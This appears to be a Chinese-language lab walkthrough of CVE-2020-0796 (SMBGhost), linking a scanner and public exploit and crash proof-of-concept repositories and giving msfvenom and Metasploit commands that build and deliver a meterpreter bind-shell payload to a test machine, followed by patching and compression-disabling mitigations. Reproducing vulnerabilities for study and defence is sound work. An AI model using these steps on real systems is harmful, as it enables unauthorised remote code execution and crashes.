CVE-2020-0796 - SMBv3漏洞复现与提权

CVE-2020-0796 - SMBv3提权
微软发布安全公告，发布了一个最新的SMB远程代码执行漏洞( CVE-2020-0796 )“永恒之黑”，攻击者可以利用漏洞进行提权实现代码执行。

提权准备工作
1、首先下载扫描器，进行检测
下载地址：

https://github.com/ollypwn/SMBGhost

python3 scanner.py <ip>

将Windows目标机的防火墙关闭，让攻击机可以ping通ip
可以看到

2、下载好可利用的POC

https://github.com/chompie1337/SMBGhost_RCE_PoC

生成shellcode

msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=192.168.220.150 LPORT=3333 -f python -o test.py

启动msf
设置payload

set payload windows/x64/meterpreter/bind_tcp
set RHOST 192.168.220.156
set LPORT 3333

将test.py中的code替换poc中的code


执行刚刚下载好exploit

执行msf中的payload

操作


蓝屏攻击
蓝屏POC链接

https://github.com/jiansiting/CVE-2020-0796
https://github.com/chompie1337/SMBGhost_RCE_PoC

漏洞修补与防范
更新最新补丁关闭危险端口号（445、139）
禁用SMBv 3压缩
您可以禁用压缩以阻止未经身份验证的攻击者利用针对SMBv 3服务器使用下面的PowerShell命令。

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force

官方链接

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796

参考文章

https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247487340&idx=1&sn=e74c796edeeccbc4be5b1ca66b7cd48f&chksm=fe7a2bf4c90da2e24692d407f7aa7481f440d0a56e2127894d927a9fd2add0de5567b97cdf7e&mpshare=1&scene=23&srcid=060666qUfZADbQpK6EyQF0q0&sharer_sharetime=1591432448856&sharer_shareid=68a0ddd9c9ffcc9062ebb3909d898b9a#rd